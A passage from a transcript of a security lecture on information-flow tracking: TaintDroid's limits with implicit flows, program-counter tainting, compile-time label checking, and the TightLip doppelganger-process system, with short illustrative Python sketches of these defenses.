actually, if this is the silicon, 1132 00:54:53,840 --> 00:54:55,340 you can probably make that work. 1133 00:54:55,340 --> 00:54:56,840 So that's definitely possible. 1134 00:54:56,840 --> 00:54:58,340 You had a question? 1135 00:54:58,340 --> 00:55:00,840 AUDIENCE: What does TaintDroid do 1136 00:55:00,840 --> 00:55:03,840 with information built from branching and permission tests. 1137 00:55:03,840 --> 00:55:06,090 PROFESSOR: Oh, we're going to get to that in a second. 1138 00:55:06,090 --> 00:55:08,339 So just hold that thought, we're going to get to that. 1139 00:55:08,339 --> 00:55:10,588 AUDIENCE: I'm curious, how long was it 1140 00:55:10,588 --> 00:55:13,796 to things like buffer overflow because all the things are so 1141 00:55:13,796 --> 00:55:14,962 nested together [INAUDIBLE]? 1142 00:55:18,850 --> 00:55:20,340 PROFESSOR: That's a good question. 
1143 00:55:20,340 --> 00:55:24,530 So presumably, one would hope that in a language like Java 1144 00:55:24,530 --> 00:55:26,950 there are no buffer overflows, right. 1145 00:55:26,950 --> 00:55:29,436 But you can imagine in a language like C, 1146 00:55:29,436 --> 00:55:31,700 for example, where you didn't have this protection, 1147 00:55:31,700 --> 00:55:33,950 maybe there's something catastrophic that could happen 1148 00:55:33,950 --> 00:55:35,964 or somehow, if you did a buffer overflow 1149 00:55:35,964 --> 00:55:37,880 and then you were able to overwrite taint tags 1150 00:55:37,880 --> 00:55:41,239 and you could set this to zeros, then you could just 1151 00:55:41,239 --> 00:55:42,280 let your data exfiltrate. 1152 00:55:42,280 --> 00:55:45,196 AUDIENCE: I think if it's super predictable, 1153 00:55:45,196 --> 00:55:47,626 like one every other one for the next q variables, 1154 00:55:47,626 --> 00:55:49,084 there's no stacking-- 1155 00:55:49,084 --> 00:55:51,546 PROFESSOR: I was going to say, that's exactly right. 1156 00:55:51,546 --> 00:55:52,550 So you run into somewhat similar issues 1157 00:55:52,550 --> 00:55:54,720 like what we discussed with the stack canaries, 1158 00:55:54,720 --> 00:55:57,520 because basically we have this data on the stack, 1159 00:55:57,520 --> 00:56:00,370 like in this particular layout, that you either 1160 00:56:00,370 --> 00:56:02,720 want to make impossible to overwrite, 1161 00:56:02,720 --> 00:56:05,400 or if it is overwritten, want to detect in some way. 1162 00:56:05,400 --> 00:56:07,264 So you're exactly right about that. 1163 00:56:12,120 --> 00:56:16,069 So you can in fact do taint tracking at this low level 1164 00:56:16,069 --> 00:56:18,360 although it may be expensive and a little bit difficult 1165 00:56:18,360 --> 00:56:19,700 to get right.
1166 00:56:19,700 --> 00:56:21,980 So you might say well, why don't we just punt 1167 00:56:21,980 --> 00:56:24,313 on this whole issue of taint tracking in the first place 1168 00:56:24,313 --> 00:56:26,870 and instead we're just going to look at the things 1169 00:56:26,870 --> 00:56:29,450 that the program tries to output over the network, let's say, 1170 00:56:29,450 --> 00:56:32,290 and just do a scan for data that seems sensitive. 1171 00:56:32,290 --> 00:56:34,150 That seems to be much more lightweight, 1172 00:56:34,150 --> 00:56:37,240 you don't have to do this dynamic instrumentation of all 1173 00:56:37,240 --> 00:56:39,240 the things the program's doing. 1174 00:56:39,240 --> 00:56:41,600 The problem with that, though, is that that will only 1175 00:56:41,600 --> 00:56:43,210 work as a heuristic. 1176 00:56:43,210 --> 00:56:46,100 In fact, if the attacker knows that this is what you're doing, 1177 00:56:46,100 --> 00:56:47,871 then it's pretty easy to subvert that. 1178 00:56:47,871 --> 00:56:49,620 So if you're just sitting there and you're 1179 00:56:49,620 --> 00:56:53,940 trying to do a grep for numbers, Social Security numbers, 1180 00:56:53,940 --> 00:56:57,030 then the attacker can just use base 64 encoding, 1181 00:56:57,030 --> 00:56:59,190 or do some other wacky thing, compress it. 1182 00:56:59,190 --> 00:57:01,630 It's actually trivial to get past that type of filter. 1183 00:57:01,630 --> 00:57:03,360 So in practice, that's completely 1184 00:57:03,360 --> 00:57:06,060 insufficient from the security perspective. 1185 00:57:06,060 --> 00:57:07,650 Now let's get back to the question 1186 00:57:07,650 --> 00:57:11,650 that you brought up, which was basically 1187 00:57:11,650 --> 00:57:16,380 how can we track flows through things like branches, 1188 00:57:16,380 --> 00:57:17,290 for example. 1189 00:57:17,290 --> 00:57:20,312 So this is basically going to lead us 1190 00:57:20,312 --> 00:57:27,450 to a topic that's called implicit flows. 
1191 00:57:27,450 --> 00:57:29,900 And so an implicit flow occurs typically 1192 00:57:29,900 --> 00:57:32,540 when you have a tainted value that's 1193 00:57:32,540 --> 00:57:38,560 going to affect the way that another variable is assigned, 1194 00:57:38,560 --> 00:57:42,730 even though that tainted value isn't directly 1195 00:57:42,730 --> 00:57:43,530 assigned to that variable. 1196 00:57:43,530 --> 00:57:46,470 This will make more sense with a concrete example. 1197 00:57:46,470 --> 00:57:51,980 Let's say that you have an if statement that does something 1198 00:57:51,980 --> 00:57:54,130 like, it's going to look at your IMEI 1199 00:57:54,130 --> 00:57:58,110 and it's going to say if it's greater than 42, 1200 00:57:58,110 --> 00:58:03,340 maybe I'm going to assign 0 to x. 1201 00:58:03,340 --> 00:58:08,350 Otherwise I'm going to assign 1. 1202 00:58:08,350 --> 00:58:11,430 So what's interesting here is that we're 1203 00:58:11,430 --> 00:58:14,240 looking at this sensitive data here 1204 00:58:14,240 --> 00:58:16,960 and we're doing some comparison of it up here, 1205 00:58:16,960 --> 00:58:19,610 but when we're assigning to x down here, 1206 00:58:19,610 --> 00:58:21,470 we're not actually assigning something 1207 00:58:21,470 --> 00:58:26,940 that is directly derived from the sensitive data here. 1208 00:58:26,940 --> 00:58:29,200 This is an example of one of these implicit flows. 1209 00:58:29,200 --> 00:58:31,070 Because the value of x is actually 1210 00:58:31,070 --> 00:58:34,880 dependent on this thing here, but the adversary, 1211 00:58:34,880 --> 00:58:37,380 if they're clever, can sort of structure their code in a way 1212 00:58:37,380 --> 00:58:39,340 that there's no direct assignment. 1213 00:58:39,340 --> 00:58:42,427 Now note that even here, instead of just assigning to x, 1214 00:58:42,427 --> 00:58:44,260 you can just say let's try to send something 1215 00:58:44,260 --> 00:58:45,190 over the network.
1216 00:58:45,190 --> 00:58:48,440 You might say over the network x is 0, 1217 00:58:48,440 --> 00:58:50,250 or x is 1, or something like that. 1218 00:58:50,250 --> 00:58:53,860 So that's an example of one of these implicit flows that 1219 00:58:53,860 --> 00:58:57,050 a system like TaintDroid cannot actually handle. 1220 00:58:57,050 --> 00:59:00,990 So do people sort of see the problem here at a high level? 1221 00:59:00,990 --> 00:59:01,490 Yes. 1222 00:59:01,490 --> 00:59:03,890 This is called an implicit flow, in contrast 1223 00:59:03,890 --> 00:59:08,042 to those direct flows like from the assignment operator. 1224 00:59:08,042 --> 00:59:15,838 AUDIENCE: What if [INAUDIBLE] a native power function that 1225 00:59:15,838 --> 00:59:17,335 did exactly [INAUDIBLE]? 1226 00:59:20,735 --> 00:59:23,355 Because the output in that case would be, right? 1227 00:59:23,355 --> 00:59:24,480 PROFESSOR: Well, let's see. 1228 00:59:24,480 --> 00:59:26,074 So it depends. 1229 00:59:26,074 --> 00:59:28,002 So if I understand your question correctly, 1230 00:59:28,002 --> 00:59:29,930 you're saying there could be some native function that 1231 00:59:29,930 --> 00:59:31,440 does something that's sort of equivalent to this, 1232 00:59:31,440 --> 00:59:34,016 and so for example, TaintDroid wouldn't know necessarily, 1233 00:59:34,016 --> 00:59:35,890 because it can't look inside this native code 1234 00:59:35,890 --> 00:59:38,627 to see this type of thing. 1235 00:59:38,627 --> 00:59:40,925 The way that the authors claim that they would handle 1236 00:59:40,925 --> 00:59:44,775 that is that they would say for native methods that are defined 1237 00:59:44,775 --> 00:59:47,380 by the VM itself, they would look at the contract 1238 00:59:47,380 --> 00:59:49,140 that method exposes and they might 1239 00:59:49,140 --> 00:59:51,540 say things like I take these two integers 1240 00:59:51,540 --> 00:59:52,980 and then return the average.
1241 00:59:52,980 --> 00:59:54,960 So then the TaintDroid system would 1242 00:59:54,960 --> 00:59:57,224 say we trust that the native function does that, so we 1243 00:59:57,224 --> 00:59:59,224 need to figure out what the appropriate tainting 1244 00:59:59,224 --> 01:00:00,380 policy should be. 1245 01:00:00,380 --> 01:00:03,165 However, you are correct that if something like this 1246 01:00:03,165 --> 01:00:05,880 was sort of hidden inside and for whatever reason wasn't 1247 01:00:05,880 --> 01:00:07,850 exposed to the public-facing contract, 1248 01:00:07,850 --> 01:00:13,310 then the manual policy that the TaintDroid authors came up with 1249 01:00:13,310 --> 01:00:15,220 might not catch this implicit flow. 1250 01:00:15,220 --> 01:00:16,700 It might actually allow information 1251 01:00:16,700 --> 01:00:17,534 to leak out somehow. 1252 01:00:17,534 --> 01:00:19,367 But I mean for that matter, there might even 1253 01:00:19,367 --> 01:00:23,514 be a direct flow in there that the TaintDroid authors couldn't 1254 01:00:23,514 --> 01:00:26,958 see and you might still have an even more direct leak. 1255 01:00:26,958 --> 01:00:30,402 AUDIENCE: So in practice, this seems very dangerous, right? 1256 01:00:30,402 --> 01:00:32,862 Because you can literally send the whole [INAUDIBLE] value 1257 01:00:32,862 --> 01:00:37,782 by just looking at this last three-- 1258 01:00:37,782 --> 01:00:38,870 PROFESSOR: That's right. 1259 01:00:38,870 --> 01:00:40,780 We had class a few times where you'd sit in a while loop 1260 01:00:40,780 --> 01:00:42,990 and you'd try to construct these implicit flows to do 1261 01:00:42,990 --> 01:00:44,050 these types of things. 1262 01:00:44,050 --> 01:00:45,950 There's actually some ways that you 1263 01:00:45,950 --> 01:00:49,390 can think about trying to fix some of this stuff. 
1264 01:00:49,390 --> 01:00:52,142 At a high level, one approach you 1265 01:00:52,142 --> 01:00:53,618 can do to try to prevent this stuff 1266 01:00:53,618 --> 01:01:03,600 is you can actually assign a taint tag to the PC. 1267 01:01:07,390 --> 01:01:18,690 Then essentially you taint it with the branch test. 1268 01:01:18,690 --> 01:01:23,130 So the idea here is that we as humans can look at this code 1269 01:01:23,130 --> 01:01:25,380 here and we can tell that there's this implicit flow 1270 01:01:25,380 --> 01:01:28,470 here, because we know that somehow to get here, 1271 01:01:28,470 --> 01:01:30,355 we had to look at the sensitive data. 1272 01:01:30,355 --> 01:01:32,480 So what does that mean at the implementation level? 1273 01:01:32,480 --> 01:01:33,979 That means that to get here, there's 1274 01:01:33,979 --> 01:01:39,180 something about the PC that has been tainted by sensitive data. 1275 01:01:39,180 --> 01:01:40,710 To say that we have gotten here is 1276 01:01:40,710 --> 01:01:43,450 to say the PC has been set to here or to here. 1277 01:01:43,450 --> 01:01:48,090 At a high level we could imagine that the system would 1278 01:01:48,090 --> 01:01:49,860 do some analysis and it would say 1279 01:01:49,860 --> 01:01:54,050 that at this point in the code, the PC has no taint at all. 1280 01:01:54,050 --> 01:01:57,180 At this point, it gets tainted somehow by the IMEI, 1281 01:01:57,180 --> 01:02:01,820 and at this point here, it's going to have that taint. 1282 01:02:01,820 --> 01:02:06,257 So what will end up happening is that if x is a variable that 1283 01:02:06,257 --> 01:02:08,090 initially shows up with no taint maybe we'll 1284 01:02:08,090 --> 01:02:09,675 say OK, at this point, it's actually 1285 01:02:09,675 --> 01:02:11,800 going to get the taint of the PC which is actually 1286 01:02:11,800 --> 01:02:13,450 going to taint it there.
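[Editor's sketch] The branch example and the PC-taint idea can be put side by side in Python. This is a minimal sketch under stated assumptions, not how TaintDroid or any particular system implements it: the function names, the `TAINT_IMEI` label, and the explicit `pc_tag` variable are hypothetical stand-ins for state a real tracker would keep inside the interpreter. The first function propagates taint only through assignments, so `x` comes out untainted even though it reveals whether the IMEI exceeds 42; the second taints the PC with the branch test and folds that taint into anything assigned inside the branch.

```python
# Hypothetical taint labels for illustration only.
TAINT_NONE = 0x0
TAINT_IMEI = 0x2


def branch_explicit_only(imei, imei_tag):
    """Assignment-only tracking: constants carry no taint, so x is untainted."""
    if imei > 42:
        x, x_tag = 0, TAINT_NONE
    else:
        x, x_tag = 1, TAINT_NONE
    return x, x_tag


def branch_with_pc_taint(imei, imei_tag):
    """PC tainting: the branch test taints the PC, and the PC taints x."""
    pc_tag = TAINT_NONE       # before the branch, the PC has no taint
    pc_tag |= imei_tag        # the test on the IMEI taints the PC
    if imei > 42:
        x, x_tag = 0, TAINT_NONE | pc_tag
    else:
        x, x_tag = 1, TAINT_NONE | pc_tag
    pc_tag = TAINT_NONE       # assumption: taint is cleared where the branches rejoin
    return x, x_tag


leaked = branch_explicit_only(100, TAINT_IMEI)
caught = branch_with_pc_taint(100, TAINT_IMEI)
```

Note that the PC-taint version labels `x` in both arms regardless of what is assigned, which is why a naive scheme can be overly conservative when both arms assign the same value.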
1287 01:02:13,450 --> 01:02:15,787 So there's some subtlety here that I'm glossing over, 1288 01:02:15,787 --> 01:02:18,200 but at a high level that's how you can capture some 1289 01:02:18,200 --> 01:02:20,450 of these flows here by actually looking and seeing how 1290 01:02:20,450 --> 01:02:22,345 the PC is getting set, and then trying 1291 01:02:22,345 --> 01:02:28,190 to propagate that to the targets of these if statements. 1292 01:02:28,190 --> 01:02:30,390 Does that all make sense? 1293 01:02:30,390 --> 01:02:30,940 OK. 1294 01:02:30,940 --> 01:02:32,648 And if you're interested in learning more 1295 01:02:32,648 --> 01:02:36,005 about this, come talk to me, there's been a lot of research 1296 01:02:36,005 --> 01:02:37,340 into this kind of stuff. 1297 01:02:37,340 --> 01:02:41,280 However, you can imagine that the system I just described 1298 01:02:41,280 --> 01:02:44,750 may be too conservative once again. 1299 01:02:44,750 --> 01:02:49,770 So imagine that instead of having this code here, 1300 01:02:49,770 --> 01:02:51,980 this was also 0. 1301 01:02:51,980 --> 01:02:56,300 So in this dumb case, there's absolutely no reason 1302 01:02:56,300 --> 01:03:00,830 to taint x with anything related to the IMEI, 1303 01:03:00,830 --> 01:03:03,590 because you didn't actually leak any information 1304 01:03:03,590 --> 01:03:04,995 in either of these branches. 1305 01:03:04,995 --> 01:03:09,780 But if you use a naive PC tainting scheme, 1306 01:03:09,780 --> 01:03:16,580 then you might over-estimate how much x has been tainted. 1307 01:03:16,580 --> 01:03:18,730 So I should say there are some subtle things you 1308 01:03:18,730 --> 01:03:21,380 can do to try to get around some of these issues, 1309 01:03:21,380 --> 01:03:24,010 but it's a little bit tricky. 1310 01:03:24,010 --> 01:03:25,435 Does this all make sense? 1311 01:03:28,006 --> 01:03:28,505 All right. 1312 01:03:28,505 --> 01:03:29,373 AUDIENCE: Just a question.
1313 01:03:29,373 --> 01:03:30,339 PROFESSOR: Oh, sorry. 1314 01:03:30,339 --> 01:03:33,720 AUDIENCE: When you get out of the if statement, so you're out 1315 01:03:33,720 --> 01:03:36,062 of the branch, do you [INAUDIBLE] taint out? 1316 01:03:36,062 --> 01:03:37,520 PROFESSOR: Yeah, so typically, yes. 1317 01:03:37,520 --> 01:03:40,640 So like down here the PC taint would be cleared. 1318 01:03:40,640 --> 01:03:43,608 So it would only be set inside these branch things here. 1319 01:03:43,608 --> 01:03:45,566 And the reason for that is because essentially, 1320 01:03:45,566 --> 01:03:47,770 by the time you get down here, you 1321 01:03:47,770 --> 01:03:49,686 get down here regardless of what the IMEI was. 1322 01:03:49,686 --> 01:03:51,114 So yeah, you clear that. 1323 01:03:51,114 --> 01:03:52,066 It's a good question. 1324 01:03:55,480 --> 01:03:55,980 Let's see. 1325 01:04:00,680 --> 01:04:03,860 We talked about how you might be able to taint 1326 01:04:03,860 --> 01:04:07,450 at this very low level. Even though that might be expensive, 1327 01:04:07,450 --> 01:04:09,130 one reason why it might be useful 1328 01:04:09,130 --> 01:04:10,705 is because it will actually allow 1329 01:04:10,705 --> 01:04:12,680 you to do things like see what your data lifetimes look like. 1330 01:04:12,680 --> 01:04:14,763 So a couple lectures ago, we talked about the fact 1331 01:04:14,763 --> 01:04:16,990 that a lot of times key data, for example, 1332 01:04:16,990 --> 01:04:19,365 will live in memory longer than you think that it should.
1333 01:04:19,365 --> 01:04:24,612 So you can imagine that even if some of the x86 or ARM level 1334 01:04:24,612 --> 01:04:27,059 taint tracking is expensive, you can imagine 1335 01:04:27,059 --> 01:04:28,725 using it to perform an audit of your system 1336 01:04:28,725 --> 01:04:30,190 and actually tainting, let's say, 1337 01:04:30,190 --> 01:04:32,415 some secret key that the user entered, 1338 01:04:32,415 --> 01:04:34,980 and just seeing where that goes throughout your system. 1339 01:04:34,980 --> 01:04:37,146 It's an offline analysis, it's not facing customers, 1340 01:04:37,146 --> 01:04:38,380 so it's OK for it to be slow. 1341 01:04:38,380 --> 01:04:40,810 That might actually really help you to figure out oh, 1342 01:04:40,810 --> 01:04:43,550 this data's getting into the keyboard buffer, 1343 01:04:43,550 --> 01:04:46,240 it's getting into the X server, it's getting to wherever. 1344 01:04:46,240 --> 01:04:49,240 So even if it's slow, that can still be very, very useful. 1345 01:04:49,240 --> 01:04:54,180 So I just wanted to mention that briefly. 1346 01:04:54,180 --> 01:04:57,290 One interesting thing you might think about 1347 01:04:57,290 --> 01:05:01,010 is the fact that as I mentioned, TaintDroid 1348 01:05:01,010 --> 01:05:06,490 is nice because it constrains the universe of taint sources 1349 01:05:06,490 --> 01:05:08,090 and taint sinks. 1350 01:05:08,090 --> 01:05:10,090 But as the developer, maybe you want to actually 1351 01:05:10,090 --> 01:05:17,895 explicitly assert some more fine-grained control over the labels 1352 01:05:17,895 --> 01:05:19,270 that your program interacts with. 1353 01:05:19,270 --> 01:05:23,110 So now as a programmer, you want to be able to say something 1354 01:05:23,110 --> 01:05:23,900 like this. 1355 01:05:23,900 --> 01:05:30,320 So you declare some int, and let's say we call it x, 1356 01:05:30,320 --> 01:05:34,320 then you associate some label with it.
1357 01:05:34,320 --> 01:05:36,360 Maybe the name of this label is that Alice 1358 01:05:36,360 --> 01:05:39,330 is the owner of this data, but Alice 1359 01:05:39,330 --> 01:05:42,320 permits Bob, or something labeled with Bob, 1360 01:05:42,320 --> 01:05:43,744 to be able to see that. 1361 01:05:43,744 --> 01:05:46,160 TaintDroid doesn't let you do this, because it essentially 1362 01:05:46,160 --> 01:05:47,830 controls that universe of labels. 1363 01:05:47,830 --> 01:05:49,534 But maybe as a programmer you want 1364 01:05:49,534 --> 01:05:51,510 to be able to do a thing like this. 1365 01:05:51,510 --> 01:05:56,770 You can imagine that your program has various input 1366 01:05:56,770 --> 01:06:01,825 channels and output channels, and all 1367 01:06:01,825 --> 01:06:03,898 of these input and output channels, 1368 01:06:03,898 --> 01:06:06,310 they all have labels, too. 1369 01:06:06,310 --> 01:06:08,950 And these are labels that you as a programmer 1370 01:06:08,950 --> 01:06:11,790 get to actually pick, as opposed to the system itself 1371 01:06:11,790 --> 01:06:14,600 trying to say here's this predefined set of things. 1372 01:06:14,600 --> 01:06:23,620 So maybe say for input channels, you know the read values, 1373 01:06:23,620 --> 01:06:25,450 maybe they get the label of the channel. 1374 01:06:28,040 --> 01:06:33,777 That's very similar to how TaintDroid works right now. 1375 01:06:33,777 --> 01:06:35,360 So if you read something from the GPS, 1376 01:06:35,360 --> 01:06:37,359 that read value gets the taint of the GPS channel, 1377 01:06:37,359 --> 01:06:43,330 but now you as a programmer can choose what those labels are. 1378 01:06:43,330 --> 01:06:47,590 And then you could imagine that for output channels the label 1379 01:06:47,590 --> 01:06:59,834 of the channel has to match the label of the value being written. 1380 01:07:05,020 --> 01:07:07,090 You can imagine other policies here as well.
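A small sketch can make the channel policy concrete. Everything here is an assumption made for illustration: the `Label`, `Labeled`, `InputChannel`, and `OutputChannel` names are hypothetical, and the check happens at runtime, whereas a language with built-in labels would aim to reject the bad write at compile time. The output policy used is one possible reading of "the labels have to match": a write succeeds only if the label on the value permits the principal behind the channel.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Label:
    """Owner of the data plus the principals the owner allows to read it."""
    owner: str
    readers: frozenset

    def allows(self, principal):
        return principal == self.owner or principal in self.readers


@dataclass(frozen=True)
class Labeled:
    """A value together with the label that travels with it."""
    value: object
    label: Label


class InputChannel:
    """Values read from an input channel get the label of the channel."""

    def __init__(self, label, source):
        self.label = label
        self._source = iter(source)

    def read(self):
        return Labeled(next(self._source), self.label)


class OutputChannel:
    """A write succeeds only if the value's label permits this channel."""

    def __init__(self, principal):
        self.principal = principal
        self.written = []

    def write(self, item):
        if not item.label.allows(self.principal):
            raise PermissionError(
                f"{self.principal} may not see data owned by {item.label.owner}"
            )
        self.written.append(item.value)
```

For example, with `alice = Label("alice", frozenset({"bob"}))`, a value read from `InputChannel(alice, [5])` can be written to `OutputChannel("bob")`, while writing it to `OutputChannel("eve")` raises `PermissionError`.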
1381 01:07:07,090 --> 01:07:09,170 But the basic idea is that there are actually 1382 01:07:09,170 --> 01:07:11,080 programming languages that allow you the developer 1383 01:07:11,080 --> 01:07:14,055 to pick what the labels are and what 1384 01:07:14,055 --> 01:07:16,370 the semantics for those labels can be. 1385 01:07:16,370 --> 01:07:19,346 So what's nice about some of these 1386 01:07:19,346 --> 01:07:22,078 is they do require the programmer to do a little bit 1387 01:07:22,078 --> 01:07:26,650 more work, but the outcome of that work 1388 01:07:26,650 --> 01:07:30,100 is that static checking-- and by static checking 1389 01:07:30,100 --> 01:07:35,948 I mean checking that's done at compile time-- 1390 01:07:35,948 --> 01:07:42,530 can catch many types of information flow bugs. 1391 01:07:42,530 --> 01:07:46,534 So if you're diligent about labeling all of your network 1392 01:07:46,534 --> 01:07:49,861 channels and screen channels with the appropriate 1393 01:07:49,861 --> 01:07:52,266 permissions, and you're very diligent about labeling 1394 01:07:52,266 --> 01:07:54,090 your data like this, what can happen 1395 01:07:54,090 --> 01:07:56,930 is that at compile time, when you compile your program, 1396 01:07:56,930 --> 01:07:59,077 your compiler can tell you things like hey, 1397 01:07:59,077 --> 01:08:01,160 if you were to run this program, then you actually 1398 01:08:01,160 --> 01:08:05,150 have an information leak, in that this particular piece of data 1399 01:08:05,150 --> 01:08:07,910 will pass through a channel that is untrusted. 1400 01:08:07,910 --> 01:08:10,605 And at a high level, the reason why static checking 1401 01:08:10,605 --> 01:08:13,910 can catch a lot of these bugs is because generally speaking, 1402 01:08:13,910 --> 01:08:16,340 when you think of some of these annotations, 1403 01:08:16,340 --> 01:08:18,580 they're somewhat similar to types.
1404 01:08:18,580 --> 01:08:23,140 So the same way that compilers can catch errors 1405 01:08:23,140 --> 01:08:25,362 involving types in a typed language, 1406 01:08:25,362 --> 01:08:26,796 you can imagine that the compiler 1407 01:08:26,796 --> 01:08:29,664 in a language like this can do some calculus 1408 01:08:29,664 --> 01:08:32,130 over these labels, and in many cases, 1409 01:08:32,130 --> 01:08:35,251 determine hey, if you were to actually run this program, 1410 01:08:35,251 --> 01:08:36,250 this would be a problem. 1411 01:08:36,250 --> 01:08:39,960 So you really need to fix the way that the labels work, 1412 01:08:39,960 --> 01:08:42,140 maybe you need to explicitly declassify something, 1413 01:08:42,140 --> 01:08:43,110 so on and so forth. 1414 01:08:43,110 --> 01:08:45,050 AUDIENCE: You can't just [INAUDIBLE]? 1415 01:08:48,445 --> 01:08:51,020 PROFESSOR: Yeah, yeah, that's right. 1416 01:08:51,020 --> 01:08:53,850 So depending on the language, these labels 1417 01:08:53,850 --> 01:08:57,380 can associate people with IO ports, all that kind of stuff. 1418 01:08:57,380 --> 01:08:59,533 That's exactly right. 1419 01:08:59,533 --> 01:09:02,949 So this is just interesting to know about, 1420 01:09:02,949 --> 01:09:06,729 because TaintDroid has a very nice general introduction 1421 01:09:06,729 --> 01:09:09,280 to this information flow stuff, but there's actually 1422 01:09:09,280 --> 01:09:10,863 some really hardcore systems out there 1423 01:09:10,863 --> 01:09:13,084 that can express much richer semantics 1424 01:09:13,084 --> 01:09:17,500 in the control of a program with respect to information flow.
1425 01:09:17,500 --> 01:09:20,180 And note, too, that when we talk about static checking 1426 01:09:20,180 --> 01:09:21,596 and being able to catch many bugs, 1427 01:09:21,596 --> 01:09:24,406 it's actually preferable to catch as many bugs using 1428 01:09:24,406 --> 01:09:27,507 static checking and static failures as opposed 1429 01:09:27,507 --> 01:09:29,998 to dynamic checking and dynamic failures. 1430 01:09:29,998 --> 01:09:31,706 There's a very subtle but powerful reason 1431 01:09:31,706 --> 01:09:32,694 for why that is. 1432 01:09:32,694 --> 01:09:35,658 The reason is that, let's say that we 1433 01:09:35,658 --> 01:09:38,375 defer all of the static checks to the runtime, which 1434 01:09:38,375 --> 01:09:39,610 you could certainly do. 1435 01:09:39,610 --> 01:09:41,310 There's no reason you couldn't take all the static checks 1436 01:09:41,310 --> 01:09:42,435 and do them at runtime. 1437 01:09:42,435 --> 01:09:45,770 The problem is that the failure or success of these checks 1438 01:09:45,770 --> 01:09:48,359 is actually a covert channel, perhaps. 1439 01:09:48,359 --> 01:09:50,065 So the attacker could actually feed 1440 01:09:50,065 --> 01:09:52,090 your program some information and then see 1441 01:09:52,090 --> 01:09:53,819 whether it crashed or not. 1442 01:09:53,819 --> 01:09:55,720 And if it crashed, it might say, aha, 1443 01:09:55,720 --> 01:09:58,960 you've failed some dynamic check of information flow, that 1444 01:09:58,960 --> 01:10:01,956 must mean something was secret about this value I sort 1445 01:10:01,956 --> 01:10:03,800 of cajoled you into computing. 1446 01:10:03,800 --> 01:10:05,590 So you want to try to make these checks 1447 01:10:05,590 --> 01:10:10,240 static to the greatest possible extent. 1448 01:10:10,240 --> 01:10:14,480 If you want more information on this kind of stuff, maybe 1449 01:10:14,480 --> 01:10:17,818 a good place to start, a word to search is Jif.
1450 01:10:17,818 --> 01:10:20,041 It's a very influential system that 1451 01:10:20,041 --> 01:10:23,746 dealt with some of these issues of label computation. 1452 01:10:23,746 --> 01:10:27,204 So you can start there and sort of roll forward. 1453 01:10:27,204 --> 01:10:29,674 My co-professor actually has done a lot of good work 1454 01:10:29,674 --> 01:10:31,340 on this, so you could ask him about that 1455 01:10:31,340 --> 01:10:34,614 if you want to talk more label stuff. 1456 01:10:34,614 --> 01:10:38,090 It's sort of interesting to know that TaintDroid 1457 01:10:38,090 --> 01:10:41,526 is actually fairly restrictive in the expressiveness 1458 01:10:41,526 --> 01:10:44,560 of the labels it allows you to look at. 1459 01:10:44,560 --> 01:10:46,143 There are systems out there that allow 1460 01:10:46,143 --> 01:10:48,150 you to do more powerful stuff. 1461 01:10:51,610 --> 01:10:58,734 Finally, what I'd like to talk about is what we can do if we 1462 01:10:58,734 --> 01:11:03,040 want to track information flows in some of these legacy 1463 01:11:03,040 --> 01:11:08,670 programs, or through programs that are written in C or C++ 1464 01:11:08,670 --> 01:11:12,040 that don't have all the fancy runtime support. 1465 01:11:12,040 --> 01:11:16,046 So there's a very cute system, by some 1466 01:11:16,046 --> 01:11:20,620 of the same authors as this paper, that looks at this issue 1467 01:11:20,620 --> 01:11:24,160 of how can we track information leaks 1468 01:11:24,160 --> 01:11:28,143 in a system where we don't want to modify 1469 01:11:28,143 --> 01:11:29,101 the application at all. 1470 01:11:29,101 --> 01:11:30,568 This is the TightLip system. 1471 01:11:30,568 --> 01:11:33,013 So the basic idea is that they introduce 1472 01:11:33,013 --> 01:11:36,305 this notion of what they call doppelganger processes. 1473 01:11:42,020 --> 01:11:44,200 Here is how TightLip uses doppelganger processes.
1474 01:11:44,200 --> 01:11:48,350 So the first thing it does is it periodically 1475 01:11:48,350 --> 01:11:54,082 scans a user's file system and it 1476 01:11:54,082 --> 01:11:57,690 looks for sensitive file types. 1477 01:11:57,690 --> 01:12:02,720 This might be things like your mail file, your word processing 1478 01:12:02,720 --> 01:12:04,859 documents, so on and so forth. 1479 01:12:04,859 --> 01:12:07,025 So what it's going to do for each one of these files 1480 01:12:07,025 --> 01:12:10,210 is it's going to produce a scrubbed version. 1481 01:12:13,410 --> 01:12:16,060 So for example, if it finds an email file, 1482 01:12:16,060 --> 01:12:22,002 it's going to replace the to or the from information with, 1483 01:12:22,002 --> 01:12:25,986 let's say, a string of the same length but just dummy data. 1484 01:12:25,986 --> 01:12:28,180 Maybe all spaces or something like that. 1485 01:12:28,180 --> 01:12:32,308 It does this as a background task. 1486 01:12:32,308 --> 01:12:36,772 Then the second thing it's going to do, at some point a process 1487 01:12:36,772 --> 01:12:40,035 is going to start executing, and so then TightLip 1488 01:12:40,035 --> 01:12:48,200 is going to detect when and if the process tries 1489 01:12:48,200 --> 01:12:49,605 to access a sensitive file. 1490 01:12:52,510 --> 01:12:57,220 And if such an access does take place, 1491 01:12:57,220 --> 01:13:01,986 TightLip is going to spawn one of these doppelganger 1492 01:13:01,986 --> 01:13:02,485 processes. 1493 01:13:05,520 --> 01:13:09,500 And so what the doppelganger process 1494 01:13:09,500 --> 01:13:14,896 looks like is very similar to the original process that 1495 01:13:14,896 --> 01:13:16,760 tried to touch that sensitive data, 1496 01:13:16,760 --> 01:13:21,786 but the key difference is that the doppelganger, which 1497 01:13:21,786 --> 01:13:27,460 I'll abbreviate DG, reads the scrubbed data. 
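The scrubbing step for an email file might look like the sketch below. It is a guess at the general shape, not TightLip's actual scrubber: the function name `scrub_email` is hypothetical, and the rule it applies (blank out the value of every `To:` and `From:` line with spaces of the same length) is just the example from the description above. It is deliberately naive and would also blank a body line that happens to start with `To:`.

```python
def scrub_email(text):
    """Return a copy of `text` with To/From values replaced by spaces.

    The scrubbed copy has exactly the same length and line structure as the
    original, so a process reading it sees a file of the same shape.
    """
    scrubbed = []
    for line in text.split("\n"):
        name, sep, value = line.partition(":")
        # Only header-like lines named To or From are redacted (assumed rule).
        if sep and name.lower() in ("to", "from"):
            line = name + sep + " " * len(value)
        scrubbed.append(line)
    return "\n".join(scrubbed)
```

Keeping the length identical matters because anything the process derives from file size or offsets should come out the same for the original and the doppelganger.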
